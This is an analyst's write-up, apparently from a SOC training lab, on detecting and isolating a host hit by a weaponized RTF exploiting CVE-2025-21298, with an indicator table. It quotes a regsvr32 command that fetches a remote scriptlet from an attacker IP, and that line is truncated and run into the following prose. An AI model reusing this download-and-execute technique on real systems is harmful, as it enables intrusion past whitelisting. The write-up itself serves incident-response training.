
Technical investigation and host containment of a Critical-severity Zero-Click RCE exploit (CVE-2025-21298) using EDR telemetry and static malware analysis.
This project documents the end-to-end investigation and containment of a Critical-severity Zero-Click Remote Code Execution (RCE) attempt. Using EDR telemetry and threat intelligence, I identified a "Living off the Land" (LotL) attack that bypassed automated defenses and established command-and-control (C2) communication.
I identified Event ID 314: Windows OLE Zero-Click RCE Detection. Initial telemetry revealed the malicious file mail.rtf was Allowed by the perimeter defenses, indicating an active compromise on the workstation 'Austin'.

I performed a reputation check of the file hash on VirusTotal. The results confirmed a 25/55 detection rate, specifically identifying the file as a weaponized RTF utilizing CVE-2025-21298. This vulnerability allows remote code execution via the Windows Preview Pane without user interaction.

I pivoted to the EDR terminal history for the host 'Austin' to identify post-exploitation behavior. I discovered a malicious "Living off the Land" (LotL) execution:
regsvr32.exe /s /u /i:http://84.38.130.118/...regsvr32.exe) to fetch a malicious script-let from a remote server, bypassing standard application whitelisting and traditional AV signatures.

Following the NIST Incident Response Framework, immediate containment was prioritized. I executed a Network Isolation on the affected host to terminate C2 communication and prevent lateral movement within the corporate network.

The incident was closed as a True Positive. I documented the Attacker IP (84.38.130.118) and the forensic evidence for the Threat Intelligence and Firewall teams to prevent future occurrences.

| Type | Value |
|---|
| C2 IP Address | 84.38.130.118 |
| File Hash (SHA256) | df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184 |
| Vulnerability | CVE-2025-21298 |
| MITRE ATT&CK | T1218.010 - Signed Binary Proxy Execution: Regsvr32 |